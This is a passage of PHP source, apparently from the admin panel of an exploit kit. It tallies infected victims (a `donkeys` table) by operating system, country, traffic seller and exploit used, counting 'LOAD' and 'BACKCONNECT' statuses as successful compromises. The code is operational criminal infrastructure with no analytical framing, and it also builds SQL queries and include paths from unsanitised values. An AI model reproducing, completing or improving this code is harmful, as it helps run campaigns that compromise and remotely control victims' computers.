579. $oss_versions = array();
580. $i = 0;
581. while ($row = mysql_fetch_array($result)){
582. $oss['os'][$i] = $row['os'];
583. $oss['all'][$i] = $row['all'];
584. $oss['frags'][$i] = $row['loaded'];
585. $z = 0;
586. $result2 = mysql_query("SELECT `os_version` AS `version`, SUM(1) AS `sum`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `frags` FROM `donkeys` WHERE `os` = '" . $row['os'] . "'" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " AND `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `os_version` ORDER BY `frags` DESC LIMIT 10");
587. while ($row2 = mysql_fetch_array($result2)){
588. $oss_versions[$row['os']]['version'][$z] = $row2['version'];
589. $oss_versions[$row['os']]['sum'][$z] = $row2['sum'];
590. $oss_versions[$row['os']]['frags'][$z] = $row2['frags'];
591. $z++;
592. }
593. $i++;
594. }
595.  
596. ///////
597. $result = mysql_query("SELECT `country`, SUM(1) AS `all`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `loaded` FROM `donkeys`" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " WHERE `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `country` ORDER BY `loaded` DESC, `all` DESC LIMIT 10");
598. $countrys = array();
599. $countrys['country'] = array();
600. $i = 0;
601. while ($row = mysql_fetch_array($result)){
602. $countrys['country'][$i] = $row['country'];
603. $countrys['all'][$i] = $row['all'];
604. $countrys['frags'][$i] = $row['loaded'];
605. $i++;
606. }
607.  
608. ///////
609. $explarray = array();
610. $exploitsdir = scandir("./secure/exploits");
611. for ($i = 0; $i < count($exploitsdir); $i++){
612. if ($exploitsdir[$i] != "." AND $exploitsdir[$i] != ".."){
613. list($name) = explode(".", $exploitsdir[$i]);
614. list($id, $namee) = explode("-", $name);
615. $explarray[$id] = $namee;
616. }
617. }
618. $result = mysql_query("SELECT `exploit`, SUM(1) AS `loaded`, SUM(`status` = 'BACKCONNECT') AS `all` FROM `donkeys` WHERE `status` <> 'NOT'" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " AND `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `exploit` ORDER BY `all` DESC, `loaded` DESC");
619. $exploit = array();
620. $exploit['exploit'] = array();
621. $i = 0;
622. while ($row = mysql_fetch_array($result)){
623. $exploit['exploit'][$i] = ($row['exploit'] == 0) ? "OTHER" : $explarray[$row['exploit']];
624. $exploit['all'][$i] = $row['all'];
625. $exploit['frags'][$i] = $row['loaded'];
626. $i++;
627. }
628.  
629.  
630. include("./secure/templates/" . $_SESSION['language'] . "/admin_statistics.php");
631. }
632.  
633.  
634.  
635. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
636. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
637. include("./secure/templates/" . $_SESSION['language'] . "/admin.php");
638. mysql_close();
639.  
640. ?>